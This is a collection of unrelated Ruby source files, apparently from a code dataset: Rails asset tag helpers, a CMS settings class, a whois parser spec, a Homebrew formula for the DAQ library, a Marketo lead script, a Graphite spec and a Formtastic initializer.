# ==== Examples
#
# stylesheet_link_tag "style"
# # => <link href="/assets/style.css" rel="stylesheet" />
#
# stylesheet_link_tag "style.css"
# # => <link href="/assets/style.css" rel="stylesheet" />
#
# stylesheet_link_tag "http://www.example.com/style.css"
# # => <link href="http://www.example.com/style.css" rel="stylesheet" />
#
# stylesheet_link_tag "style.less", extname: false, skip_pipeline: true, rel: "stylesheet/less"
# # => <link href="/stylesheets/style.less" rel="stylesheet/less">
#
# stylesheet_link_tag "style", media: "all"
# # => <link href="/assets/style.css" media="all" rel="stylesheet" />
#
# stylesheet_link_tag "style", media: "print"
# # => <link href="/assets/style.css" media="print" rel="stylesheet" />
#
# stylesheet_link_tag "random.styles", "/css/stylish"
# # => <link href="/assets/random.styles" rel="stylesheet" />
# # <link href="/css/stylish.css" rel="stylesheet" />
def stylesheet_link_tag(*sources)
options = sources.extract_options!.stringify_keys
path_options = options.extract!("protocol", "extname", "host", "skip_pipeline").symbolize_keys
preload_links = []
crossorigin = options.delete("crossorigin")
crossorigin = "anonymous" if crossorigin == true
nopush = options["nopush"].nil? ? true : options.delete("nopush")
integrity = options["integrity"]
sources_tags = sources.uniq.map { |source|
href = path_to_stylesheet(source, path_options)
if preload_links_header
preload_link = "<#{href}>; rel=preload; as=style"
preload_link += "; crossorigin=#{crossorigin}" unless crossorigin.nil?
preload_link += "; integrity=#{integrity}" unless integrity.nil?
preload_link += "; nopush" if nopush
preload_links << preload_link
end
tag_options = {
"rel" => "stylesheet",
"crossorigin" => crossorigin,
"href" => href
}.merge!(options)
if apply_stylesheet_media_default && tag_options["media"].blank?
tag_options["media"] = "screen"
end
tag(:link, tag_options)
}.join("\n").html_safe
if preload_links_header
send_preload_links_header(preload_links)
end
sources_tags
end
# Returns a link tag that browsers and feed readers can use to auto-detect
# an RSS, Atom, or JSON feed. The +type+ can be <tt>:rss</tt> (default),
# <tt>:atom</tt>, or <tt>:json</tt>. Control the link options in url_for format
# using the +url_options+. You can modify the LINK tag itself in +tag_options+.
#
# ==== Options
#
# * <tt>:rel</tt> - Specify the relation of this link, defaults to "alternate"
# * <tt>:type</tt> - Override the auto-generated mime type
# * <tt>:title</tt> - Specify the title of the link, defaults to the +type+
#
# ==== Examples
#
# auto_discovery_link_tag
# # => <link rel="alternate" type="application/rss+xml" title="RSS" href="http://www.currenthost.com/controller/action" />
# auto_discovery_link_tag(:atom)
# # => <link rel="alternate" type="application/atom+xml" title="ATOM" href="http://www.currenthost.com/controller/action" />
# auto_discovery_link_tag(:json)
# # => <link rel="alternate" type="application/json" title="JSON" href="http://www.currenthost.com/controller/action" />
# auto_discovery_link_tag(:rss, {action: "feed"})
# # => <link rel="alternate" type="application/rss+xml" title="RSS" href="http://www.currenthost.com/controller/feed" />
# auto_discovery_link_tag(:rss, {action: "feed"}, {title: "My RSS"})
# # => <link rel="alternate" type="application/rss+xml" title="My RSS" href="http://www.currenthost.com/controller/feed" />
# auto_discovery_link_tag(:rss, {controller: "news", action: "feed"})
# # => <link rel="alternate" type="application/rss+xml" title="RSS" href="http://www.currenthost.com/news/feed" />
# auto_discovery_link_tag(:rss, "http://www.example.com/feed.rss", {title: "Example RSS"})
# # => <link rel="alternate" type="application/rss+xml" title="Example RSS" href="http://www.example.com/feed.rss" />
def auto_discovery_link_tag(type = :rss, url_options = {}, tag_options = {})
if !(type == :rss || type == :atom || type == :json) && tag_options[:type].blank?
raise ArgumentError.new("You should pass :type tag_option key explicitly, because you have passed #{type} type other than :rss, :atom, or :json.")
end
tag(
"link",
"rel" => tag_options[:rel] || "alternate",
"type" => tag_options[:type] || Template::Types[type].to_s,
"title" => tag_options[:title] || type.to_s.upcase,
"href" => url_options.is_a?(Hash) ? url_for(url_options.merge(only_path: false)) : url_options
)
end
# Returns a link tag for a favicon managed by the asset pipeline.
#
# If a page has no link like the one generated by this helper, browsers
# ask for <tt>/favicon.ico</tt> automatically, and cache the file if the
# request succeeds. If the favicon changes it is hard to get it updated.
#
# To have better control applications may let the asset pipeline manage
# their favicon storing the file under <tt>app/assets/images</tt>, and
# using this helper to generate its corresponding link tag.
#
# The helper gets the name of the favicon file as first argument, which
# defaults to "favicon.ico", and also supports +:rel+ and +:type+ options
# to override their defaults, "shortcut icon" and "image/x-icon"
# respectively:
#
# favicon_link_tag
# # => <link href="/assets/favicon.ico" rel="shortcut icon" type="image/x-icon" />
#
# favicon_link_tag 'myicon.ico'
# # => <link href="/assets/myicon.ico" rel="shortcut icon" type="image/x-icon" />
#
# Mobile Safari looks for a different link tag, pointing to an image that
# will be used if you add the page to the home screen of an iOS device.
# The following call would generate such a tag:
#
# favicon_link_tag 'mb-icon.png', rel: 'apple-touch-icon', type: 'image/png'
# # => <link href="/assets/mb-icon.png" rel="apple-touch-icon" type="image/png" />
def favicon_link_tag(source = "favicon.ico", options = {})
tag("link", {
rel: "shortcut icon",
type: "image/x-icon",
href: path_to_image(source, skip_pipeline: options.delete(:skip_pipeline))
}.merge!(options.symbolize_keys))
end
# Returns a link tag that browsers can use to preload the +source+.
  # The +source+ can be the path of a resource managed by the asset pipeline,
  # a full path, or a URI.
#
# ==== Options
#
# * <tt>:type</tt> - Override the auto-generated mime type, defaults to the mime type for +source+ extension.
# * <tt>:as</tt> - Override the auto-generated value for as attribute, calculated using +source+ extension and mime type.
# * <tt>:crossorigin</tt> - Specify the crossorigin attribute, required to load cross-origin resources.
  # * <tt>:nopush</tt> - Set to +true+ if server push is not desired for the
  #   resource. Defaults to +false+.
# * <tt>:integrity</tt> - Specify the integrity attribute.
#
# ==== Examples
#
# preload_link_tag("custom_theme.css")
# # => <link rel="preload" href="/assets/custom_theme.css" as="style" type="text/css" />
#
# preload_link_tag("/videos/video.webm")
# # => <link rel="preload" href="/videos/video.mp4" as="video" type="video/webm" />
#
# preload_link_tag(post_path(format: :json), as: "fetch")
# # => <link rel="preload" href="/posts.json" as="fetch" type="application/json" />
#
# preload_link_tag("worker.js", as: "worker")
# # => <link rel="preload" href="/assets/worker.js" as="worker" type="text/javascript" />
#
# preload_link_tag("//example.com/font.woff2")
# # => <link rel="preload" href="//example.com/font.woff2" as="font" type="font/woff2" crossorigin="anonymous"/>
#
# preload_link_tag("//example.com/font.woff2", crossorigin: "use-credentials")
# # => <link rel="preload" href="//example.com/font.woff2" as="font" type="font/woff2" crossorigin="use-credentials" />
#
# preload_link_tag("/media/audio.ogg", nopush: true)
# # => <link rel="preload" href="/media/audio.ogg" as="audio" type="audio/ogg" />
#
def preload_link_tag(source, options = {})
href = asset_path(source, skip_pipeline: options.delete(:skip_pipeline))
extname = File.extname(source).downcase.delete(".")
mime_type = options.delete(:type) || Template::Types[extname]&.to_s
as_type = options.delete(:as) || resolve_link_as(extname, mime_type)
crossorigin = options.delete(:crossorigin)
crossorigin = "anonymous" if crossorigin == true || (crossorigin.blank? && as_type == "font")
integrity = options[:integrity]
nopush = options.delete(:nopush) || false
link_tag = tag.link(**{
rel: "preload",
href: href,
as: as_type,
type: mime_type,
crossorigin: crossorigin
}.merge!(options.symbolize_keys))
preload_link = "<#{href}>; rel=preload; as=#{as_type}"
preload_link += "; type=#{mime_type}" if mime_type
preload_link += "; crossorigin=#{crossorigin}" if crossorigin
preload_link += "; integrity=#{integrity}" if integrity
preload_link += "; nopush" if nopush
send_preload_links_header([preload_link])
link_tag
end
# Returns an HTML image tag for the +source+. The +source+ can be a full
# path, a file, or an Active Storage attachment.
#
# ==== Options
#
# You can add HTML attributes using the +options+. The +options+ supports
# additional keys for convenience and conformance:
#
# * <tt>:size</tt> - Supplied as "{Width}x{Height}" or "{Number}", so "30x45" becomes
# width="30" and height="45", and "50" becomes width="50" and height="50".
# <tt>:size</tt> will be ignored if the value is not in the correct format.
# * <tt>:srcset</tt> - If supplied as a hash or array of <tt>[source, descriptor]</tt>
# pairs, each image path will be expanded before the list is formatted as a string.
#
# ==== Examples
#
# Assets (images that are part of your app):
#
# image_tag("icon")
# # => <img src="/assets/icon" />
# image_tag("icon.png")
# # => <img src="/assets/icon.png" />
# image_tag("icon.png", size: "16x10", alt: "Edit Entry")
# # => <img src="/assets/icon.png" width="16" height="10" alt="Edit Entry" />
# image_tag("/icons/icon.gif", size: "16")
# # => <img src="/icons/icon.gif" width="16" height="16" />
# image_tag("/icons/icon.gif", height: '32', width: '32')
# # => <img height="32" src="/icons/icon.gif" width="32" />
# image_tag("/icons/icon.gif", class: "menu_icon")
# # => <img class="menu_icon" src="/icons/icon.gif" />
# image_tag("/icons/icon.gif", data: { title: 'Rails Application' })
# # => <img data-title="Rails Application" src="/icons/icon.gif" />
# image_tag("icon.png", srcset: { "icon_2x.png" => "2x", "icon_4x.png" => "4x" })
# # => <img src="/assets/icon.png" srcset="/assets/icon_2x.png 2x, /assets/icon_4x.png 4x">
# image_tag("pic.jpg", srcset: [["pic_1024.jpg", "1024w"], ["pic_1980.jpg", "1980w"]], sizes: "100vw")
# # => <img src="/assets/pic.jpg" srcset="/assets/pic_1024.jpg 1024w, /assets/pic_1980.jpg 1980w" sizes="100vw">
#
# Active Storage blobs (images that are uploaded by the users of your app):
#
# image_tag(user.avatar)
# # => <img src="/rails/active_storage/blobs/.../tiger.jpg" />
# image_tag(user.avatar.variant(resize_to_limit: [100, 100]))
# # => <img src="/rails/active_storage/representations/.../tiger.jpg" />
# image_tag(user.avatar.variant(resize_to_limit: [100, 100]), size: '100')
# # => <img width="100" height="100" src="/rails/active_storage/representations/.../tiger.jpg" />
def image_tag(source, options = {})
options = options.symbolize_keys
check_for_image_tag_errors(options)
skip_pipeline = options.delete(:skip_pipeline)
options[:src] = resolve_image_source(source, skip_pipeline)
if options[:srcset] && !options[:srcset].is_a?(String)
options[:srcset] = options[:srcset].map do |src_path, size|
src_path = path_to_image(src_path, skip_pipeline: skip_pipeline)
"#{src_path} #{size}"
end.join(", ")
end
options[:width], options[:height] = extract_dimensions(options.delete(:size)) if options[:size]
options[:loading] ||= image_loading if image_loading
options[:decoding] ||= image_decoding if image_decoding
tag("img", options)
end
# Returns an HTML video tag for the +sources+. If +sources+ is a string,
# a single video tag will be returned. If +sources+ is an array, a video
# tag with nested source tags for each source will be returned. The
# +sources+ can be full paths or files that exist in your public videos
# directory.
#
# ==== Options
#
# When the last parameter is a hash you can add HTML attributes using that
# parameter. The following options are supported:
#
# * <tt>:poster</tt> - Set an image (like a screenshot) to be shown
# before the video loads. The path is calculated like the +src+ of +image_tag+.
# * <tt>:size</tt> - Supplied as "{Width}x{Height}" or "{Number}", so "30x45" becomes
# width="30" and height="45", and "50" becomes width="50" and height="50".
# <tt>:size</tt> will be ignored if the value is not in the correct format.
  # * <tt>:poster_skip_pipeline</tt> - Bypass the asset pipeline when using
  #   the <tt>:poster</tt> option, and use an asset from the public folder instead.
#
# ==== Examples
#
# video_tag("trailer")
# # => <video src="/videos/trailer"></video>
# video_tag("trailer.ogg")
# # => <video src="/videos/trailer.ogg"></video>
# video_tag("trailer.ogg", controls: true, preload: 'none')
# # => <video preload="none" controls="controls" src="/videos/trailer.ogg"></video>
# video_tag("trailer.m4v", size: "16x10", poster: "screenshot.png")
# # => <video src="/videos/trailer.m4v" width="16" height="10" poster="/assets/screenshot.png"></video>
# video_tag("trailer.m4v", size: "16x10", poster: "screenshot.png", poster_skip_pipeline: true)
# # => <video src="/videos/trailer.m4v" width="16" height="10" poster="screenshot.png"></video>
# video_tag("/trailers/hd.avi", size: "16x16")
# # => <video src="/trailers/hd.avi" width="16" height="16"></video>
# video_tag("/trailers/hd.avi", size: "16")
# # => <video height="16" src="/trailers/hd.avi" width="16"></video>
# video_tag("/trailers/hd.avi", height: '32', width: '32')
# # => <video height="32" src="/trailers/hd.avi" width="32"></video>
# video_tag("trailer.ogg", "trailer.flv")
# # => <video><source src="/videos/trailer.ogg" /><source src="/videos/trailer.flv" /></video>
# video_tag(["trailer.ogg", "trailer.flv"])
# # => <video><source src="/videos/trailer.ogg" /><source src="/videos/trailer.flv" /></video>
# video_tag(["trailer.ogg", "trailer.flv"], size: "160x120")
# # => <video height="120" width="160"><source src="/videos/trailer.ogg" /><source src="/videos/trailer.flv" /></video>
def video_tag(*sources)
options = sources.extract_options!.symbolize_keys
public_poster_folder = options.delete(:poster_skip_pipeline)
sources << options
multiple_sources_tag_builder("video", sources) do |tag_options|
tag_options[:poster] = path_to_image(tag_options[:poster], skip_pipeline: public_poster_folder) if tag_options[:poster]
tag_options[:width], tag_options[:height] = extract_dimensions(tag_options.delete(:size)) if tag_options[:size]
end
end
# Returns an HTML audio tag for the +sources+. If +sources+ is a string,
# a single audio tag will be returned. If +sources+ is an array, an audio
# tag with nested source tags for each source will be returned. The
# +sources+ can be full paths or files that exist in your public audios
# directory.
#
# When the last parameter is a hash you can add HTML attributes using that
# parameter.
#
# audio_tag("sound")
# # => <audio src="/audios/sound"></audio>
# audio_tag("sound.wav")
# # => <audio src="/audios/sound.wav"></audio>
# audio_tag("sound.wav", autoplay: true, controls: true)
# # => <audio autoplay="autoplay" controls="controls" src="/audios/sound.wav"></audio>
# audio_tag("sound.wav", "sound.mid")
# # => <audio><source src="/audios/sound.wav" /><source src="/audios/sound.mid" /></audio>
def audio_tag(*sources)
multiple_sources_tag_builder("audio", sources)
end
private
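      # Builds a single <audio>/<video> tag when one source is given, or a
      # tag with nested <source> children for multiple sources, resolving
      # each path via the matching path_to_audio/path_to_video helper.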
def multiple_sources_tag_builder(type, sources)
options = sources.extract_options!.symbolize_keys
skip_pipeline = options.delete(:skip_pipeline)
sources.flatten!
yield options if block_given?
if sources.size > 1
content_tag(type, options) do
safe_join sources.map { |source| tag("source", src: send("path_to_#{type}", source, skip_pipeline: skip_pipeline)) }
end
else
options[:src] = send("path_to_#{type}", sources.first, skip_pipeline: skip_pipeline)
content_tag(type, nil, options)
end
end
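      # Resolves +source+ into a URL: symbols and strings go through the
      # asset helpers, while other objects (e.g. Active Storage attachments)
      # are routed through polymorphic_url.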
def resolve_image_source(source, skip_pipeline)
if source.is_a?(Symbol) || source.is_a?(String)
path_to_image(source, skip_pipeline: skip_pipeline)
else
polymorphic_url(source)
end
rescue NoMethodError => e
raise ArgumentError, "Can't resolve image into URL: #{e}"
end
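      # Parses the :size option into a [width, height] pair, for example:
      #   extract_dimensions("30x45") # => ["30", "45"]
      #   extract_dimensions("50")    # => ["50", "50"]
      #   extract_dimensions("50x")   # => nil (and the option is ignored)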
def extract_dimensions(size)
size = size.to_s
if /\A\d+x\d+\z/.match?(size)
size.split("x")
elsif /\A\d+\z/.match?(size)
[size, size]
end
end
def check_for_image_tag_errors(options)
if options[:size] && (options[:height] || options[:width])
raise ArgumentError, "Cannot pass a :size option with a :height or :width option"
end
end
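      # Maps a file extension and mime type to the value used for the link
      # tag's +as+ attribute, e.g. "js" => "script", "css" => "style",
      # "vtt" => "track", and "audio/ogg" => "audio".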
def resolve_link_as(extname, mime_type)
if extname == "js"
"script"
elsif extname == "css"
"style"
elsif extname == "vtt"
"track"
elsif (type = mime_type.to_s.split("/")[0]) && type.in?(%w(audio video font))
type
end
end
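      # Sends the collected preload links as Early Hints when the request
      # supports them, and appends them to the response's "Link" header.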
def send_preload_links_header(preload_links)
if respond_to?(:request) && request
request.send_early_hints("Link" => preload_links.join("\n"))
end
if respond_to?(:response) && response
response.headers["Link"] = [response.headers["Link"].presence, *preload_links].compact.join(",")
end
end
end
end
end
| 48.192446 | 156 | 0.608621 |
62089d9571b386b7f4a9738677a62a7f6be7f118 | 841 | module CMS
class Settings
DEFAULT_MODE = 'published'.freeze
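    # Minimal usage sketch (hypothetical +app_settings+ and +session+ objects):
    #   cms = CMS::Settings.new(app_settings, session)
    #   cms.admin?                # => true when session[:cms_token] matches the configured token
    #   cms.render_draft_content? # => true for admins whose session is in draft mode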
def initialize(settings, session)
@settings = settings
@session = session
end
def render_draft_content?
admin? && cms_session.draft?
end
def admin?
valid_token?(user_cms_token)
end
def valid_token?(token)
token.present? && token == @settings.cms_token
end
def escape_html?
if render_draft_content?
@settings.cms_escape_draft_html?
else
@settings.cms_escape_published_html?
end
end
def content_for_store
@content_for_store ||= CMS::ContentForStore.new
end
private
def user_cms_token
@session[:cms_token]
end
def cms_session
ActiveSupport::StringInquirer.new(@session[:cms] || DEFAULT_MODE)
end
end
end
| 18.688889 | 73 | 0.637337 |
e865c0ea619b38af8db0f6a6790e1e6321b50d35 | 7,089 | # encoding: utf-8
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# /spec/fixtures/responses/whois.ati.tn/tn/status_registered.expected
#
# and regenerate the tests with the following rake task
#
# $ rake spec:generate
#
require 'spec_helper'
require 'whois/record/parser/whois.ati.tn.rb'
describe Whois::Record::Parser::WhoisAtiTn, "status_registered.expected" do
subject do
file = fixture("responses", "whois.ati.tn/tn/status_registered.txt")
part = Whois::Record::Part.new(body: File.read(file))
described_class.new(part)
end
describe "#disclaimer" do
it do
expect(subject.disclaimer).to eq("All rights reserved.\nCopyright \"Tunisian Internet Agency - http://whois.tn\"")
end
end
describe "#domain" do
it do
expect(subject.domain).to eq("google.tn")
end
end
describe "#domain_id" do
it do
expect { subject.domain_id }.to raise_error(Whois::AttributeNotSupported)
end
end
describe "#status" do
it do
expect(subject.status).to eq(:registered)
end
end
describe "#available?" do
it do
expect(subject.available?).to eq(false)
end
end
describe "#registered?" do
it do
expect(subject.registered?).to eq(true)
end
end
describe "#created_on" do
it do
expect(subject.created_on).to be_a(Time)
expect(subject.created_on).to eq(Time.parse("2009-05-14 00:00:00"))
end
end
describe "#updated_on" do
it do
expect { subject.updated_on }.to raise_error(Whois::AttributeNotSupported)
end
end
describe "#expires_on" do
it do
expect { subject.expires_on }.to raise_error(Whois::AttributeNotSupported)
end
end
describe "#registrar" do
it do
expect(subject.registrar).to be_a(Whois::Record::Registrar)
expect(subject.registrar.id).to eq(nil)
expect(subject.registrar.name).to eq("3S Global Net")
expect(subject.registrar.organization).to eq(nil)
expect(subject.registrar.url).to eq(nil)
end
end
describe "#registrant_contacts" do
it do
expect(subject.registrant_contacts).to be_a(Array)
expect(subject.registrant_contacts.size).to eq(1)
expect(subject.registrant_contacts[0]).to be_a(Whois::Record::Contact)
expect(subject.registrant_contacts[0].type).to eq(Whois::Record::Contact::TYPE_REGISTRANT)
expect(subject.registrant_contacts[0].id).to eq(nil)
expect(subject.registrant_contacts[0].name).to eq("GOOGLE Inc")
expect(subject.registrant_contacts[0].organization).to eq(nil)
expect(subject.registrant_contacts[0].address).to eq("PO BOX 2050 Moutain view CA 94042 USA")
expect(subject.registrant_contacts[0].city).to eq(nil)
expect(subject.registrant_contacts[0].zip).to eq(nil)
expect(subject.registrant_contacts[0].state).to eq(nil)
expect(subject.registrant_contacts[0].country).to eq(nil)
expect(subject.registrant_contacts[0].country_code).to eq(nil)
expect(subject.registrant_contacts[0].phone).to eq("+1 925 685 9600")
expect(subject.registrant_contacts[0].fax).to eq("+1 925 685 9620")
expect(subject.registrant_contacts[0].email).to eq("[email protected]")
expect(subject.registrant_contacts[0].created_on).to eq(Time.parse("2009-05-14 00:00:00"))
expect(subject.registrant_contacts[0].updated_on).to eq(Time.parse("2010-07-18 00:00:00"))
end
end
describe "#admin_contacts" do
it do
expect(subject.admin_contacts).to be_a(Array)
expect(subject.admin_contacts.size).to eq(1)
expect(subject.admin_contacts[0]).to be_a(Whois::Record::Contact)
expect(subject.admin_contacts[0].type).to eq(Whois::Record::Contact::TYPE_ADMINISTRATIVE)
expect(subject.admin_contacts[0].id).to eq(nil)
expect(subject.admin_contacts[0].name).to eq("GOOGLE Inc")
expect(subject.admin_contacts[0].organization).to eq(nil)
expect(subject.admin_contacts[0].address).to eq("PO BOX 2050 Moutain view CA 94042 USA")
expect(subject.admin_contacts[0].city).to eq(nil)
expect(subject.admin_contacts[0].zip).to eq(nil)
expect(subject.admin_contacts[0].state).to eq(nil)
expect(subject.admin_contacts[0].country).to eq(nil)
expect(subject.admin_contacts[0].country_code).to eq(nil)
expect(subject.admin_contacts[0].phone).to eq("+1 925 685 9600")
expect(subject.admin_contacts[0].fax).to eq("+1 925 685 9620")
expect(subject.admin_contacts[0].email).to eq("[email protected]")
expect(subject.admin_contacts[0].created_on).to eq(Time.parse("2009-05-14 00:00:00"))
expect(subject.admin_contacts[0].updated_on).to eq(Time.parse("2010-07-18 00:00:00"))
end
end
describe "#technical_contacts" do
it do
expect(subject.technical_contacts).to be_a(Array)
expect(subject.technical_contacts.size).to eq(1)
expect(subject.technical_contacts[0]).to be_a(Whois::Record::Contact)
expect(subject.technical_contacts[0].type).to eq(Whois::Record::Contact::TYPE_TECHNICAL)
expect(subject.technical_contacts[0].id).to eq(nil)
expect(subject.technical_contacts[0].name).to eq("GOOGLE Inc")
expect(subject.technical_contacts[0].organization).to eq(nil)
expect(subject.technical_contacts[0].address).to eq("PO BOX 2050 Moutain view CA 94042 USA")
expect(subject.technical_contacts[0].city).to eq(nil)
expect(subject.technical_contacts[0].zip).to eq(nil)
expect(subject.technical_contacts[0].state).to eq(nil)
expect(subject.technical_contacts[0].country).to eq(nil)
expect(subject.technical_contacts[0].country_code).to eq(nil)
expect(subject.technical_contacts[0].phone).to eq("+1 925 685 9600")
expect(subject.technical_contacts[0].fax).to eq("+1 925 685 9620")
expect(subject.technical_contacts[0].email).to eq("[email protected]")
expect(subject.technical_contacts[0].created_on).to eq(Time.parse("2009-05-14 00:00:00"))
expect(subject.technical_contacts[0].updated_on).to eq(Time.parse("2010-07-18 00:00:00"))
end
end
describe "#nameservers" do
it do
expect(subject.nameservers).to be_a(Array)
expect(subject.nameservers.size).to eq(4)
expect(subject.nameservers[0]).to be_a(Whois::Record::Nameserver)
expect(subject.nameservers[0].name).to eq("ns1.google.com")
expect(subject.nameservers[0].ipv4).to eq("216.239.32.10")
expect(subject.nameservers[1]).to be_a(Whois::Record::Nameserver)
expect(subject.nameservers[1].name).to eq("ns2.google.com")
expect(subject.nameservers[1].ipv4).to eq("216.239.34.10")
expect(subject.nameservers[2]).to be_a(Whois::Record::Nameserver)
expect(subject.nameservers[2].name).to eq("ns3.google.com")
expect(subject.nameservers[2].ipv4).to eq("216.239.36.10")
expect(subject.nameservers[3]).to be_a(Whois::Record::Nameserver)
expect(subject.nameservers[3].name).to eq("ns4.google.com")
expect(subject.nameservers[3].ipv4).to eq("216.239.38.10")
end
end
end
| 43.22561 | 120 | 0.703061 |
9150a0feb5b6e9391824cdfb3585389348e3207a | 1,795 | class Daq < Formula
desc "Network intrusion prevention and detection system"
homepage "https://www.snort.org/"
url "https://www.snort.org/downloads/snort/daq-2.0.6.tar.gz"
sha256 "b40e1d1273e08aaeaa86e69d4f28d535b7e53bdb3898adf539266b63137be7cb"
bottle do
cellar :any
sha256 "d01c68e8ece0df01a1132b9591dad43a84381e601848915972fdbe9497ecada2" => :high_sierra
sha256 "f0be58035bc6f4764567cf186673035818e6025d027695795f959fdfc88c7806" => :sierra
sha256 "9c2720bd46954e9f2631801d8f8283974436a82827f01c9e954e319f0b9f7e88" => :el_capitan
sha256 "02d198f42f56471feaf127824230d7ea752490b3c7f5a34f8b50ff0a85062f01" => :yosemite
sha256 "8ce4fbbbb9f6189f6ee51d3223a81ebc7ea76069353bd284822989d6ccc364a5" => :mavericks
sha256 "bced15005e13eaa11ec6d47afbb1137f61231a191fb05a295e2762cc6cc8ef29" => :mountain_lion
end
# libpcap on >= 10.12 has pcap_lib_version() instead of pcap_version
# Reported 8 Oct 2017 to bugs AT snort DOT org
if MacOS.version >= :sierra
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/b345dac/daq/patch-pcap-version.diff"
sha256 "20d2bf6aec29824e2b7550f32251251cdc9d7aac3a0861e81a68cd0d1e513bf3"
end
end
def install
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}"
system "make", "install"
end
test do
(testpath/"test.c").write <<-EOS.undent
#include <daq.h>
#include <stdio.h>
int main()
{
DAQ_Module_Info_t* list;
int size = daq_get_module_list(&list);
daq_free_module_list(list, size);
return 0;
}
EOS
system ENV.cc, "test.c", "-L#{lib}", "-ldaq", "-o", "test"
system "./test"
end
end
| 35.9 | 106 | 0.707521 |
d59edfa3d5cbc16f1f077d15a560b2d68d464682 | 1,253 | $:.unshift(File.expand_path('../../lib/', __FILE__))
require_relative '../lib/mkto_rest'
# or require 'mkto_gem' if you installed the gem
require 'yaml'
=begin
This script looks for the hostname, client id and key in .mktorest.
Create that file with the following (yaml) format:
---
:hostname: ''
:client_id: ''
:client_secret: ''
set your hostname, client id and key to the right values.
=end
config_path = File.expand_path(File.join(File.dirname(__FILE__),'..', '.mktorest'))
if File.exist? config_path
config = YAML::load_file(config_path)
else
print <<-EOF
"Set your hostname, client id and key in #{config_path} in this format:
#{{ hostname: '', client_id: '', client_secret: '' }.to_yaml}
EOF
exit 1
end
if ARGV.size < 1
print "#{__FILE__} <lead_email> \n e.g.: #{__FILE__} [email protected] \n\n"
exit 1
end
attr_v = ARGV.shift
values = {}
ARGV.each do |pair|
k, v = pair.split('=')
values[k] = v
end
client = MktoRest::Client.new(host: config[:hostname], client_id: config[:client_id], client_secret: config[:client_secret])
#client.debug = true #verbose output, helps debugging
# find leads, updated fields.
client.get_leads :email, attr_v do |lead|
p "id: #{lead.id}, email: #{lead.email}"
end
| 21.982456 | 124 | 0.682362 |
d5b55625a0675e94c6ee21c2fe82f19adb932d8b | 2,040 | require_relative '../../../libraries/helpers'
describe 'find_carbon_cache_services' do
let(:node) do
Hash[
'graphite' => {
'carbon' => {
'service_type' => 'runit',
'caches' => {
          'a' => { 'line_receiver_port' => 2003 },
          'b' => { 'line_receiver_port' => 2004 },
          'c' => { 'line_receiver_port' => 2005 }
}
}
}
]
end
context 'when a single carbon-cache service is defined and run under runit' do
before do
node['graphite']['carbon']['caches'].delete('b')
node['graphite']['carbon']['caches'].delete('c')
end
it 'should return a single runit_service carbon-cache service name' do
caches = find_carbon_cache_services(node)
caches.should == [
'runit_service[carbon-cache-a]',
]
end
end
context 'when multiple carbon-cache services are defined and run under runit' do
it 'should return multiple runit_service carbon-cache service names' do
caches = find_carbon_cache_services(node)
caches.sort.should == [
'runit_service[carbon-cache-a]',
'runit_service[carbon-cache-b]',
'runit_service[carbon-cache-c]'
]
end
end
context 'when a single carbon-cache service is defined and not run under runit' do
before do
node['graphite']['carbon']['service_type'] = ""
node['graphite']['carbon']['caches'].delete('b')
node['graphite']['carbon']['caches'].delete('c')
end
it 'should return a single service carbon-cache service name' do
caches = find_carbon_cache_services(node)
caches.sort.should == ['service[carbon-cache]']
end
end
context 'when multiple carbon-cache services are defined and not run under runit' do
before do
node['graphite']['carbon']['service_type'] = ""
end
it 'should return a single service carbon-cache service name' do
caches = find_carbon_cache_services(node)
caches.sort.should == ['service[carbon-cache]']
end
end
end
| 29.565217 | 86 | 0.617647 |
39b7ef338276eea1f362725cf4a0984facbd06f6 | 6,276 | # encoding: utf-8
# Set the default text field size when input is a string. Default is nil.
# Formtastic::FormBuilder.default_text_field_size = 50
# Set the default text area height when input is a text. Default is 20.
# Formtastic::FormBuilder.default_text_area_height = 5
# Set the default text area width when input is a text. Default is nil.
# Formtastic::FormBuilder.default_text_area_width = 50
# Should all fields be considered "required" by default?
# Defaults to true.
# Formtastic::FormBuilder.all_fields_required_by_default = true
# Should select fields have a blank option/prompt by default?
# Defaults to true.
# Formtastic::FormBuilder.include_blank_for_select_by_default = true
# Set the string that will be appended to the labels/fieldsets which are required.
# It accepts string or procs and the default is a localized version of
# '<abbr title="required">*</abbr>'. In other words, if you configure formtastic.required
# in your locale, it will replace the abbr title properly. But if you don't want to use
# abbr tag, you can simply give a string as below.
# Formtastic::FormBuilder.required_string = "(required)"
# Set the string that will be appended to the labels/fieldsets which are optional.
# Defaults to an empty string ("") and also accepts procs (see required_string above).
# Formtastic::FormBuilder.optional_string = "(optional)"
# Set the way inline errors will be displayed.
# Defaults to :sentence, valid options are :sentence, :list, :first and :none
# Formtastic::FormBuilder.inline_errors = :sentence
# Formtastic uses the following classes as default for hints, inline_errors and error list
# If you override the class here, please ensure to override it in your stylesheets as well.
# Formtastic::FormBuilder.default_hint_class = "inline-hints"
# Formtastic::FormBuilder.default_inline_error_class = "inline-errors"
# Formtastic::FormBuilder.default_error_list_class = "errors"
# Set the method to call on label text to transform or format it for human-friendly
# reading when formtastic is used without object. Defaults to :humanize.
# Formtastic::FormBuilder.label_str_method = :humanize
# Set the array of methods to try calling on parent objects in :select and :radio inputs
# for the text inside each @<option>@ tag or alongside each radio @<input>@. The first method
# that is found on the object will be used.
# Defaults to ["to_label", "display_name", "full_name", "name", "title", "username", "login", "value", "to_s"]
# Formtastic::FormBuilder.collection_label_methods = [
# "to_label", "display_name", "full_name", "name", "title", "username", "login", "value", "to_s"]
# Specifies if labels/hints for input fields automatically be looked up using I18n.
# Default value: true. Overridden for specific fields by setting value to true,
# i.e. :label => true, or :hint => true (or opposite depending on initialized value)
# Formtastic::FormBuilder.i18n_lookups_by_default = false
# Specifies if I18n lookups of the default I18n Localizer should be cached to improve performance.
# Defaults to true.
# Formtastic::FormBuilder.i18n_cache_lookups = false
# Specifies the class to use for localization lookups. You can create your own
# class and use it instead by subclassing Formtastic::Localizer (which is the default).
# Formtastic::FormBuilder.i18n_localizer = MyOwnLocalizer
# You can add custom inputs or override parts of Formtastic by subclassing Formtastic::FormBuilder and
# specifying that class here. Defaults to Formtastic::FormBuilder.
# Formtastic::Helpers::FormHelper.builder = MyCustomBuilder
# All formtastic forms have a class that indicates that they are just that. You
# can change it to any class you want.
# Formtastic::Helpers::FormHelper.default_form_class = 'formtastic'
# Formtastic will infer a class name from the model, array, string or symbol you pass to the
# form builder. You can customize the way that class is presented by overriding
# this proc.
